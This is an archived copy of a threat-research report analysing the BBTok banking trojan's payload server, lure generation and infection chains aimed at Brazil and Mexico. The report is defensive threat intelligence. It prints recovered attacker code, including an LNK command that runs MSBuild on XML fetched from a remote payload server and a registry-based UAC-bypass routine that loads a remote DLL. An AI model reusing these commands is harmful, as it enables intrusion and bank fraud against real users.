{
	"id": "b29cf643-df1d-4655-ab4a-19bc01e6b37f",
	"created_at": "2026-05-05T02:46:16.459841Z",
	"updated_at": "2026-05-05T02:46:37.169628Z",
	"deleted_at": null,
	"sha1_hash": "4f0595e0f441ec7d4b66741c6ed6878f2d9799b8",
	"title": "Behind the Scenes of BBTok: Analyzing a Banker’s Server Side Components",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 125482,
	"plain_text": "Behind the Scenes of BBTok: Analyzing a Banker’s Server Side\r\nComponents\r\nBy etal\r\nPublished: 2023-09-20 · Archived: 2026-05-05 02:17:42 UTC\r\nIntroduction\r\nCheck Point Research recently discovered an active campaign operating and deploying a new variant of the BBTok banker\r\nin Latin America. In the research, we highlight newly discovered infection chains that use a unique combination of Living\r\noff the Land Binaries (LOLBins). This resulting in low detection rates, even though BBTok banker operates at least since\r\n2020. As we analyzed the campaign, we came across some of the threat actor’s server-side resources used in the attacks,\r\ntargeting hundreds of users in Brazil and Mexico.\r\nThe server-side components are responsible for serving malicious payloads that are likely distributed through phishing links.\r\nWe’ve observed numerous iterations of the same server-side scripts and configuration files which demonstrate the evolution\r\nof the BBTok banker deployment methods over time. This insight allowed us to catch a glimpse of infection vectors that the\r\nactors have not yet implemented, as well as trace the origins of the source code employed for sustaining such operations.\r\nIn this report, we highlight some of the server-side functionalities of the payload server which are used to distribute the\r\nbanker. Those allow to generate unique payloads to each of the victims, generated upon a click.\r\nKey Findings\r\n1. BBTok continues being active, targeting users in Brazil and Mexico, employing multi-layered geo-fencing to ensure\r\ninfected machines are from those countries only.\r\n2. Since the last public reporting on BBTok in 2020, the operators’ techniques, tactics and procedures (TTPs) have\r\nevolved significantly, adding additional layers of obfuscation and downloaders, resulting in low detection rates.\r\n3. The BBTok banker has a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian\r\nbanks, and tricks the victims into entering its 2FA code to their bank accounts or into entering their payment card\r\nnumber.\r\n4. The newly identified payloads are generated by a custom server-side application, responsible for generating unique\r\npayloads for each victim based on operating system and location.\r\n5. Analysis of payload server-side code revealed the actors are actively maintaining diversified infection chains for\r\ndifferent versions of Windows. Those chains employ a wide variety of file types, including ISO, ZIP, LNK, DOCX,\r\nJS and XLL.\r\n6. The threat actors add open-source code, code from hacking forums, and new exploits when those appear (e.g.\r\nFollina) to their arsenal.\r\nBackground\r\nThe BBTok banker, first revealed in 2020, was deployed in Latin America through fileless attacks. The banker has a wide set\r\nof functionalities, including enumerating and killing processes, keyboard and mouse control and manipulating clipboard\r\ncontents. Alongside those, BBTok contains classic banking Trojan features, simulating fake login pages to a wide variety of\r\nbanks operating in Mexico and Brazil.\r\nSince it was first publicly disclosed, the BBTok operators have adopted new TTPs, all while still primarily utilizing phishing\r\nemails with attachments for the initial infection. Recently we’ve seen indications of the banker distributed through phishing\r\nlinks, and not as attachments to the email itself.\r\nUpon accessing the malicious link, an ISO or ZIP file is downloaded to the victim’s machines. Those contain an LNK file\r\nthat kicks off the infection chain, leading to the deployment of the banker while opening a decoy document. Although the\r\nprocess appears to be quite straightforward upon first glimpse, we’ve found evidence that there’s a lot going on behind the\r\nscenes.\r\nWhile analyzing these newly identified links, we’ve uncovered internal server-side resources used to distribute the malware.\r\nLooking at those, it became evident the actor has maintained a much wider variety of infection chains, generated on demand\r\nwith each click, tailored to match the victim’s operating system and location.\r\nBBTok Banking Hijacks\r\nBBTok enables its operators a wide set of capabilities, ranging from remote commands to classic banking Trojan\r\ncapabilities. BBTok can replicate the interfaces of multiple Latin American banks. Its code references over 40 major banks\r\nin Mexico and Brazil, such as Citibank, Scotibank, Banco Itaú and HSBC (see Appendix B for the full list of targeted\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 1 of 13\n\nbanks). The banker searches for indications of its victims being clients of those banks by iterating over the open windows\r\nand names of browser tabs, searching for bank names.\r\nThe default target the banker apparently aims at is BBVA, with the default fake interface aiming to replicate its looks.\r\nPosing as legitimate institutions, these fake interfaces coax unsuspecting users into divulging personal and financial details.\r\nThe focus of this functionality is tricking the victim into entering the security code/ token number that serves as 2FA for\r\nbank account and to conduct account takeovers of victim’s bank account. In some cases, this capability also aims to trick the\r\nvictim into entering his payment card number.\r\nFigure 1 – Examples of fake interfaces embedded within the BBTok Banker.\r\nBBTok, which is written in Delphi, uses the Visual Component Library (VCL) to create forms that, quite literally, form these\r\nfake interfaces. This allows the attackers to dynamically and naturally generate interfaces that fit the victim’s computer\r\nscreen and a specific form for the bank of the victim, without raising suspicion. BBVA, which is the default bank the banker\r\ntargets, has its interface stored in one such form named “TFRMBG”. In addition to Banking sites, the attackers have kept up\r\nwith the times and have also started searching for information regarding Bitcoin on the infected machine, actively looking\r\nfor strings such as ‘bitcoin’, ‘Electrum’, and ‘binance’.\r\nBBTok doesn’t stop at visual trickery; it has other capabilities as well. Specifically, it can install a malicious browser\r\nextension or inject a DLL named “rpp.dll” to further its hold on the infected system, and likely to improve its capabilities to\r\ntrick the victims. Those were not available during the time of analysis.\r\nWhat’s notable is the operator’s cautious approach: all banking activities are only executed upon direct command from its\r\nC2 server, and are not automatically carried out on every infected system.\r\nPayload Server Analysis\r\nOverview of the Payload Server\r\nTo effectively manage their campaign, the BBTok operators created a unique flow kicked off by the victim clicking a\r\nmalicious link, likely sent in a phishing email. When a victim clicks the link, it results in the download of either a ZIP\r\narchive or an ISO image, depending on the victim’s operating system. Although the process is seamless for the victim, the\r\nserver generates a unique payload based on parameters found within the request.\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 2 of 13\n\nFigure 2 – Server-side components used in BBTok infections.\r\nThis process is carried out on a XAMPP-based server, and contains three essential components:\r\n1. A PowerShell script that handles payload preparation and contains the main bulk of the logic for creating lure\r\narchives.\r\n2. A PHP codebase and database designed to document and manage infections.\r\n3. Auxiliary utilities that enhance the functionality of these components.\r\nThis is the chain of events:\r\n1. A victim performs an HTTP request to either  /baixar ,  /descargar  or  /descarga  (these paths suggest that the\r\nlures are in either Spanish or Portuguese).\r\n2. Based on the  .htaccess  file, the server handles the request using  descarga.php .\r\n3. The scripts utilize the file  db.php  to store information via an SQLite database about the request, including the\r\nvictim’s fingerprint.\r\n4. Descarga.php  calls  ps_gen.ps1  to generate a custom archive, which is eventually delivered to the victim.\r\nIncoming Requests Handling\r\nThe PHP codebase is composed of the following files:\r\n1. descarga  /  descargar.php  – Manages new connections and serves lure documents to the victim’s PC.\r\n2. db.php  – Generates and manages the SQLite database that includes the victim’s details.\r\n3. generator.php  – Utility class used to generate random links, strings, and other functionalities.\r\n“Descarga” and “descargar” translate to “download” in Spanish. This file contains the main logic of the infection process.\r\nThe script itself contains many comments, some of them in plain Spanish and Portuguese, which provide hints as to the\r\nattackers’ origin.\r\nThe script logic:\r\n1. It checks the geolocation of the link-referred victim against ip-api.com and stores it in a file. If the victim isn’t from a\r\ntargeted country (i.e., Mexico or Brazil) the HTTP connection ends immediately with a 404 message.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n$api = new IpApi();\r\n$whoAmI = $api-\u003eGetInfo($ip);\r\n$allowed = array(\"MX\", \"BR\");\r\nfile_put_contents(\"ips/\".$ip.$whoAmI-\u003ecountryCode, \"\");\r\nif(!in_array($whoAmI-\u003ecountryCode, $allowed)) {\r\nhttp_response_code(404);\r\ndie();\r\n}\r\n$api = new IpApi(); $whoAmI = $api-\u003eGetInfo($ip); $allowed = array(\"MX\", \"BR\");\r\nfile_put_contents(\"ips/\".$ip.$whoAmI-\u003ecountryCode, \"\"); if(!in_array($whoAmI-\u003ecountryCode, $allowed)) {\r\nhttp_response_code(404); die(); }\r\n$api = new IpApi();\r\n$whoAmI = $api-\u003eGetInfo($ip);\r\n$allowed = array(\"MX\", \"BR\");\r\nfile_put_contents(\"ips/\".$ip.$whoAmI-\u003ecountryCode, \"\");\r\nif(!in_array($whoAmI-\u003ecountryCode, $allowed)) {\r\n http_response_code(404);\r\n die();\r\n}\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 3 of 13\n\n2. If the victim passes the check, the script then parses the user agent to get the victim’s Windows OS version.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n$useragent = strtolower(htmlspecialchars($_SERVER['HTTP_USER_AGENT']));\r\n$match = false;\r\n$dfile = \"10\";\r\n$dfiles = array (\r\n'windows nt 10.0' =\u003e '10',\r\n'windows nt 6.3' =\u003e '10',\r\n'windows nt 6.2' =\u003e '10',\r\n'windows nt 6.1' =\u003e '7',\r\n'windows nt 6.0' =\u003e '7',\r\n'windows nt 5.2' =\u003e '7'\r\n);\r\nforeach($dfiles as $os=\u003e$file) {\r\nif (preg_match('/' . $os . '/i', $useragent)) {\r\n$match = true;\r\n$dfile = $file;\r\nbreak;\r\n}\r\n}\r\n$useragent = strtolower(htmlspecialchars($_SERVER['HTTP_USER_AGENT'])); $match = false; $dfile = \"10\";\r\n$dfiles = array ( 'windows nt 10.0' =\u003e '10', 'windows nt 6.3' =\u003e '10', 'windows nt 6.2' =\u003e '10', 'windows nt 6.1' =\u003e\r\n'7', 'windows nt 6.0' =\u003e '7', 'windows nt 5.2' =\u003e '7' ); foreach($dfiles as $os=\u003e$file) { if (preg_match('/' . $os . '/i',\r\n$useragent)) { $match = true; $dfile = $file; break; } }\r\n$useragent = strtolower(htmlspecialchars($_SERVER['HTTP_USER_AGENT']));\r\n$match = false;\r\n$dfile = \"10\";\r\n$dfiles = array (\r\n 'windows nt 10.0' =\u003e '10',\r\n 'windows nt 6.3' =\u003e '10',\r\n 'windows nt 6.2' =\u003e '10',\r\n 'windows nt 6.1' =\u003e '7',\r\n 'windows nt 6.0' =\u003e '7',\r\n 'windows nt 5.2' =\u003e '7'\r\n);\r\nforeach($dfiles as $os=\u003e$file) {\r\n if (preg_match('/' . $os . '/i', $useragent)) {\r\n $match = true;\r\n $dfile = $file;\r\n break;\r\n }\r\n}\r\n3. It then passes the user agent with the victim’s country code and lure filename to the PowerShell payload\r\ngenerator script.\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 4 of 13\n\nPowerShell Payload Generator\r\nThe script  ps_gen.ps1  contains the main logic for generating archive payloads, either as ZIP or ISO files. The latest\r\nversion of the code has a lot of commented-out sections that were likely functional in the past, which suggests they contain\r\nadditional infection chains and lures. We found multiple versions of the file, some dating back to July 2022, demonstrating\r\nthat this operation has been ongoing for quite a while.\r\nOur analysis of the latest version is below. For more details on earlier variations and changes to the script over time, see the\r\nsection “Earlier Versions.”\r\nThe generator script is called by  descarga.php , using the function  DownloadFile  with the\r\narguments  file_name ,  ver  and  cc.  These correspond to the generated archive name, the victim’s OS version and the\r\nvictim’s country code.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nfunction DownloadFile($file_name, $ver, $cc) {\r\nif($ver == \"10\" )\r\n{\r\n$ext = \"iso\";\r\n} else {\r\n$ext = \"zip\";\r\n}\r\nexec('powershell -ex Bypass -File ./ps_gen.ps1 '.$file_name.' '.$ver.' '.$cc);\r\nreturn $file_name.'.'.$ext;\r\n}\r\nfunction DownloadFile($file_name, $ver, $cc) { if($ver == \"10\" ) { $ext = \"iso\"; } else { $ext = \"zip\"; }\r\nexec('powershell -ex Bypass -File ./ps_gen.ps1 '.$file_name.' '.$ver.' '.$cc); return $file_name.'.'.$ext; }\r\n function DownloadFile($file_name, $ver, $cc) {\r\n if($ver == \"10\" )\r\n {\r\n $ext = \"iso\";\r\n } else {\r\n $ext = \"zip\";\r\n }\r\n exec('powershell -ex Bypass -File ./ps_gen.ps1 '.$file_name.' '.$ver.' '.$cc);\r\n return $file_name.'.'.$ext;\r\n}\r\nThe code portions utilized in the observed iteration of the server generate the archive payloads based on two parameters:\r\n1. The origin country of the victim – Brazil or Mexico.\r\n2. Operating System extracted from the User-Agent – Windows 10 or 7.\r\nAccording to the results, the following parameters of the malicious archive are selected:\r\n1. Type of the archive: ISO for Windows 10, ZIP for Windows 7, and others.\r\n2. The name of the DLL file that is used in the next stage changes according to the targeted country:  Trammy  is used\r\nfor Brazil, and  Gammy  is used for Mexico.\r\n3. The archive contains an LNK. The LNK shortcut icon in Windows 10 is the one used by Microsoft Edge, and the one\r\nfor Windows 7 is used by Google Chrome.\r\n4. The final execution logic. For Windows 10 victims, the script executes MSBuild.exe with a file\r\nnamed  dat.xml  from the server  216[.]250[.]251[.]196 , which also stores the malicious DLLs for the next stage.\r\nFor Windows 7, the payload just downloads the relevant remote DLL via CMD execution.\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 5 of 13\n\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n$shortcutName = $args[0]\r\n$win = $args[1]\r\n$country = $args[2]\r\n$stegoKey = New-StegoKey 35\r\nif($country -eq \"BR\") {\r\n$dllName = 'Trammy'\r\n} else {\r\n$dllName = 'Gammy'\r\n}\r\nif($win -eq \"10\") {\r\n$wstate = 7\r\n$shortcutIconLocation = \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"\r\nCopyMSBuild($shortcutName)\r\n} else {\r\n$wstate = 7\r\n$shortcutIconLocation = \"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\"\r\n}\r\n$shortcutName = $args[0] $win = $args[1] $country = $args[2] $stegoKey = New-StegoKey 35 if($country -eq\r\n\"BR\") { $dllName = 'Trammy' } else { $dllName = 'Gammy' } if($win -eq \"10\") { $wstate = 7\r\n$shortcutIconLocation = \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"\r\nCopyMSBuild($shortcutName) } else { $wstate = 7 $shortcutIconLocation = \"C:\\Program Files\r\n(x86)\\Google\\Chrome\\Application\\chrome.exe\" }\r\n$shortcutName = $args[0]\r\n$win = $args[1]\r\n$country = $args[2]\r\n$stegoKey = New-StegoKey 35\r\nif($country -eq \"BR\") {\r\n $dllName = 'Trammy'\r\n} else {\r\n $dllName = 'Gammy'\r\n}\r\nif($win -eq \"10\") {\r\n $wstate = 7\r\n $shortcutIconLocation = \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"\r\n CopyMSBuild($shortcutName)\r\n} else {\r\n $wstate = 7\r\n $shortcutIconLocation = \"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\"\r\n}\r\nAdd-PoshObfuscation\r\nAll payloads are obfuscated using the Add-PoshObfuscation function. A simple search for parts of the code yields a single\r\nresult from the “benign” site hackforums[.]net, specifically a response from a user named “Qismon” in August 2021. This\r\nindividual recommends some methods to bypass AMSI and security products, and also shares the PoshObfuscation code:\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 6 of 13\n\nFigure 3 – Add-PoshObfuscation() code shared in hackforums[.]net.\r\nInfection Chains and Final Payload\r\nThe process described above eventually leads to two variations of the infection chain: one for Windows 7 and one for\r\nWindows 10. The differences between the two versions can be explained as attempts to avoid newly implemented detection\r\nmechanisms such as AMSI.\r\n*ammy.dll Downloaders\r\nBoth infection chains utilize malicious DLLs named using a similar convention –  Trammy ,  Gammy ,  Brammy , or  Kammy .\r\nThe latter are leaner and obfuscated versions of BBTok’s loader that use geofencing to thwart detection before executing any\r\nmalicious actions. The final payload is a new version of the BBTok banker. As documented previously, BBTok comes\r\npacked with multiple additional password-protected software. These allow the actors full access to the infected machine, and\r\nadditional functionalities.\r\nWindows 7 Infection Chain\r\nFigure 4 – Windows 7 Infection Chain.\r\nThe infection chain for Windows 7 is not unique and consists of an LNK file stored in a ZIP file. Upon execution, the LNK\r\nfile runs the *ammy.dll payload using  rundll32.exe , which in turn downloads, extracts, and runs the BBTok payload.\r\nWindows 10 Infection Chain\r\nFigure 5 – Windows 10 Infection Chain.\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 7 of 13\n\nThe infection chain for Windows 10 is stored in an ISO file containing 3 components: an LNK file, a lure file, and a\r\nrenamed cmd.exe executable. Clicking the LNK file kicks off the infection chain, using the renamed cmd.exe to run all the\r\ncommands in the following manner:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nDANFE352023067616112\\DANFE352023067616112.exe /c copy\r\n%cd%\\DANFE352023067616112\\DANFE352023067616112.pdf %userprofile%\\DANFE352023067616112.pdf /Y \u0026 start\r\n%userprofile%\\DANFE352023067616112.pdf \u0026 C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe -nologo\r\n\\\\216.250.251.196\\file\\dat.xml\r\nDANFE352023067616112\\DANFE352023067616112.exe /c copy\r\n%cd%\\DANFE352023067616112\\DANFE352023067616112.pdf %userprofile%\\DANFE352023067616112.pdf /Y \u0026 start\r\n%userprofile%\\DANFE352023067616112.pdf \u0026 C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe -nologo\r\n\\\\216.250.251.196\\file\\dat.xml\r\nDANFE352023067616112\\DANFE352023067616112.exe /c copy %cd%\\DANFE352023067616112\\DANFE352023067616112.pdf %user\r\nThe infection chain:\r\n1. Copy the lure file to the folder  %userprofile%  and open it.\r\nFigure 6 – Lure document dropped in BBTok infection.\r\n2. Run  MSBuild.exe  to build an application using an XML stored on a remote server, fetched over SMB.\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 8 of 13\n\n3. MSBuild.exe  creates a randomly named DLL, which in turn downloads *ammy.dll from the server and runs it with\r\na renamed  rundll32.exe ( mmd.exe ), as seen in the XML contents:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nprivate void ByFD() {\r\nString reg = \"/c REG ADD HKCU\\\\Software\\\\Classes\\\\.pwn\\\\Shell\\\\Open\\\\command -ve /d \\\"C:\\\\ProgramData\\\\mmd.exe\r\n\\\\\\\\216.250.251.196\\\\file\\\\Trammy.dll, Dacl \u0026 REG DELETE HKCU\\\\Software\\\\Classes\\\\ms-settings /f \u0026 REG DELETE\r\nHKCU\\\\Software\\\\Classes\\\\.pwn /f\\\" /f \u0026 REG ADD HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\CurVer -ve /d \\\".pwn\\\" /f \u0026\r\ntimeout /t 3 \u003enul \u0026 start /MIN computerdefaults.exe\";\r\nStartProcess(\"cmd.exe\", reg); }\r\nprivate void ByFD() { String reg = \"/c REG ADD HKCU\\\\Software\\\\Classes\\\\.pwn\\\\Shell\\\\Open\\\\command -ve /d\r\n\\\"C:\\\\ProgramData\\\\mmd.exe \\\\\\\\216.250.251.196\\\\file\\\\Trammy.dll, Dacl \u0026 REG DELETE HKCU\\\\Software\\\\Classes\\\\ms-settings /f \u0026 REG DELETE HKCU\\\\Software\\\\Classes\\\\.pwn /f\\\" /f \u0026 REG ADD HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\CurVer -ve /d \\\".pwn\\\" /f \u0026 timeout /t 3 \u003enul \u0026 start /MIN computerdefaults.exe\"; StartProcess(\"cmd.exe\", reg); }\r\nprivate void ByFD() {\r\n String reg = \"/c REG ADD HKCU\\\\Software\\\\Classes\\\\.pwn\\\\Shell\\\\Open\\\\command -ve /d \\\"C:\\\\ProgramData\\\\mmd\r\n StartProcess(\"cmd.exe\", reg); }\r\n4. The *ammy.dll downloader downloads, extracts, and runs the BBTok payload.\r\nThe unique combination of renamed CMD, MSBuild, and file fetching over SMB results in a low detection rate for the\r\nWindows 10 infection chains.\r\nEarlier Versions\r\nThroughout our analysis of the BBTok campaign, we came across multiple versions of the artifacts from the payload server.\r\nWe saw changes in all parts of the operation: the PHP code, the PowerShell script, and other utilities.\r\nChanges in the PHP Code\r\nLooking at an earlier version of the  descarga.php  script, we saw a few key differences:\r\n1. Originally, only victims from Mexico were targeted.\r\n2. The IP of a different payload server,  176[.]31[.]159[.]196 , was hard-coded in the script.\r\n3. Instead of executing the PowerShell script directly, a script named  gen.php  was called. We were unable to obtain\r\nthis script, but believe it simply executed the PowerShell script.\r\n4. The victim’s IP address, user agent, and a flag ( jaBaixou , or ‘already downloaded’ in Portuguese) were inserted\r\ninto a database, using the  db.php  file. The flag is later checked to not serve the same payload twice.\r\nAs this section is not used in the latest version, it is possible that the attackers found this process cumbersome and\r\ndecided to trade OPSEC for easier management and a higher chance of infection success.\r\nModifications of the PowerShell Script\r\nLooking at older versions of the PowerShell script, it was clear that numerous changes were done to the payload and\r\nexecution chain. Some noteworthy ones include:\r\n1. In the earliest versions of the script, the LNK simply ran a PowerShell script with the arguments  -ExecutionPolicy\r\nUnrestricted-W hidden-File \\\\%PARAM%[.]supplier[.]serveftp[.]net\\files\\asd.ps1 .\r\n2. A later update added the lure PDF,  fac.pdf  (“fac” is an abbreviation of “factura”, which is “invoice” in\r\nPortuguese). This is a legitimate receipt, in Spanish, from the county of Colima in Mexico. Additionally, the payload\r\nfor Windows 7 victims launched a legitimate Mexican government\r\nsite,  hxxps://failover[.]www[.]gob[.]mx/mantenimiento.html .\r\n3. The newest version we found opens a different legitimate site,  hxxps://fazenda[.]gov[.]br , a Brazilian\r\ngovernment site. This version also changes the XML file used by MSBuild and changes the name of the DLL\r\nreserved for Brazilian targets from  Brammy.dll  to  Trammy.dll .\r\nUnused Code and Infection Vectors\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 9 of 13\n\nCertain sections of the code within the PowerShell script were unused, and the server hosted files that were not part of the\r\nprimary infection flow we discussed. In particular, we did not discover any indication of active usage of the following:\r\n1. ze.docx  is a document that exploits the Follina CVE (2022-30190). It is referenced in the PowerShell script in a\r\nfunction named  CreateDoc .\r\n2. xll.xll , which is referenced by  CreateXLL , is a malicious xll taken from the open-source\r\nproject https://github.com/moohax/xllpoc, which implements code execution via Excel.\r\n3. Numerous empty JavaScript files were found on the server, likely to be used by a function named  CreateJS . The\r\nfile referenced in the function,  b.js , was empty, so it is unclear whether this function was previously used or was\r\nnever fully implemented.\r\n4. Multiple bat files were located on the server, each with a different implementation of downloading next stages. These\r\nwere most likely created by a function named  CreateBat , which is commented out in the latest version of the\r\nPowerShell script. Most of them are almost identical to the code in the  ByFD  function we analyzed previously,\r\nexcluding two noteworthy past iterations:\r\na. The oldest bat file downloaded another PowerShell script as a next stage (which wasn’t publicly available\r\nanymore) instead of editing the registry;\r\nb. A later bat file used the fodhelper UAC bypass instead of the computerdefaults one which is currently being\r\nused.\r\nVictimology and Attribution\r\nOur analysis of the server-side component also sheds light on one of the recent campaigns as seen from the threat actors’\r\nside, based on a database we found that documents access to the malicious application. The database is\r\nnamed  links.sqlite  and is pretty straightforward. It contains over 150 entries, all unique, with the table headers\r\ncorresponding to the ones created by  db.php . Note the use of the Portuguese language and the names of the 4 rows:\r\n1. chave , or key;\r\n2. assunto , or subject;\r\n3. user_agent  ;\r\n4. baixou , or downloaded.\r\nThe column named  chave  contained the IP addresses of the victims, and the column  assunto  was empty:\r\nFigure 7 – Links.sqlite database.\r\nFigure 8 – Attack region.\r\nAs the server code was never meant to be seen by anyone except the threat actors, and it contained numerous comments in\r\nPortuguese, we believe this indicates that with a high probability the threat actors are Brazilians, which is known for its\r\nactive banking malware eco-system.\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 10 of 13\n\nConclusion\r\nAlthough BBTok has been able to remain under the radar due to its elusive techniques and targeting victims only in Mexico\r\nand Brazil, it’s evident that it is still actively deployed. Due to its many capabilities, and its unique and creative delivery\r\nmethod involving LNK files, SMB and MSBuild, it still poses a danger to organizations and individuals in the region.\r\nIt is rare for security researchers to get an up-close look at the attackers’ workbench, and even rarer to get glimpses of it as it\r\nevolved over time. What we saw reinforces our belief that all threat actors, including financially motivated ones, are\r\nconstantly evolving and improving their methods, as well as following new security trends and trying out fresh ideas and\r\nopportunities. To keep up and protect against future attacks, security researchers must do the same.\r\nCheck Point Protections\r\nCheck Point Threat Emulation:\r\nBanker.Wins.BBTok.A\r\nBanker.Win.BBTok.B\r\nTechnique.Wins.SuxXll.A\r\nTrojan.Win.XllAddings.A\r\nHarmony Endpoint:\r\nTrojan.Win.Generic.AQ\r\nTrojan.Win.Generic.AR\r\nAppendix A – IOCs\r\nFiles\r\nName Description sha256\r\nDANFE357702036539112.iso\r\nBrazilian\r\nLure\r\nArchive\r\nbe36c832a1186fd752dd975d31284bdd2ac3342bd3d329\r\nDANFE357666506667634.iso\r\nBrazilian\r\nLure\r\nArchive\r\n095b793d60ce5b15fac035e03d41f1ddd2e462ec4fa00cc\r\nDANFE352023067616112.iso\r\nBrazilian\r\nLure\r\nArchive\r\n8e65383a91716b87651d3fa60bc39967927ab01b230086\r\nDANFE358567378531506.pdf\r\nBrazilian\r\nLure PDF\r\n825a5c221cb8247831745d44b424954c99e9023843c96\r\nBrammy.dll\r\nBBTok\r\nDownloader\r\nfor\r\nBrazilian\r\nVictims\r\ne5e89824f52816d786aaac4ebdb07a898a827004a94bee\r\nTrammy.dll\r\nBBTok\r\nDownloader\r\nfor\r\nBrazilian\r\nVictims\r\n07028ec2a727330a3710dba8940aa97809f47e75e1fd94\r\nHtmlFactura3f48daa069f0e42253194ca7b51e7481DPCYKJ4Ojk.iso\r\nMexican\r\nLure\r\nArchive\r\n808e0ddccd5ae4b8cbc4747a5ee044356b7aa673547245\r\nHtmlFactura-497fc589432931214ed0f7f4de320f3brzi8y1MTdn.iso\r\nMexican\r\nLure\r\nArchive\r\nf83b33acfd9390309eefb4a17b42e89dcdbe759757844a3\r\nHtmlFactura-4887f50edb734a49d33639883b60796do52lTREjMh.iso\r\nMexican\r\nLure\r\nArchive\r\ndbeb4960cdb04999c1a5a3360c9112e3bc1de79534d7ac\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 11 of 13\n\nName Description sha256\r\nHtml-Factura35493606948895934113728188857090JCOY.pdf\r\nMexican\r\nLure PDF\r\nbe35b48dfec1cc2fc046423036fa76fc9096123efadac065\r\nKammy.dll\r\nBBTok\r\nDownloader\r\nfor Mexican\r\nVictims\r\n9d91437a3bfd37f68cc3e2e2acfbbbbfffa3a73d8f3f466b\r\nGammy.dll\r\nBBTok\r\nDownloader\r\nfor Mexican\r\nVictims\r\nd9b2450e4b91739c39981ab34ec7a3aeb33fb3b75deb45\r\nze.docx\r\nUnused\r\nMaldoc\r\n3b43de8555d8f413a797e19c414a55578882ad7bbcb6ad\r\nxll.xll\r\nUnused\r\nMalicious\r\nxll\r\nfb7a958b99275caa0c04be2a821b2a821bb797c4be6bd0\r\nfe BBTok cd22e14f4fa6716cfc9964fdead813d2ffb80d6dd716e211\r\nfe2 BBTok 5c59cd977890ed32eb60caca8dc2c9a667cff4edc2b1201\r\nfe2 BBTok 5ad42b39f368a25a00d9fe15fa5326101c43bf4c296b64c\r\nfe235 BBTok b198da893972df5b0f2cbcec859c0b6c88bb3cf285477b6\r\nNetwork Indicators\r\nName Description\r\ndanfe[.]is-certified[.]com Phishing Domain\r\nrendinfo[.]shop Phishing Domain\r\nsodkvsodkv[.]supplier[.]serveftp[.]net Malicious DLL Download Domain\r\n216[.]250[.]251[.]196 Payload Server\r\n173[.]249[.]196[.]195 Payload Server\r\n176[.]31[.]159[.]196 Payload Server\r\n147[.]124[.]213[.]152 Payload Server\r\nAppendix B – List of Targeted Banks\r\nBanking Caixa CCB Brasil\r\nBanco Itaú Mercantil do Brasil\r\nSantander BANCO PAULISTA\r\nGetnet Banco Daycoval\r\nSicredi Mercado Pago\r\nSicoob Nubank\r\nCitibank Brasil C6 Bank\r\nInternet Banking BNB Internet Banking Inter\r\nUnicred Portal Bancoob\r\nBanco da Amazonia BBVA\r\nBanestes Banorte\r\nBanco Alfa HSBC\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 12 of 13\n\nBanpará Banamex\r\nBanese Bajio\r\nBRB Banknet Scotiabank\r\nBanco Intermedium Afirme\r\nBanco Topázio Banregio\r\nUniprime Azteca\r\nCooperativa de Crédito – CrediSIS Multiva\r\nBanco Original Inbursa\r\nBanco Fibra CiBanco\r\nBradesco Despachantes e Auto Escola – Cidadetran Sicoobnet\r\nNavegador Exclusivo Banco do Brasil\r\nSource: https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nhttps://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
	],
	"report_names": [
		"behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components"
	],
	"threat_actors": [],
	"ts_created_at": 1777949176,
	"ts_updated_at": 1777949197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
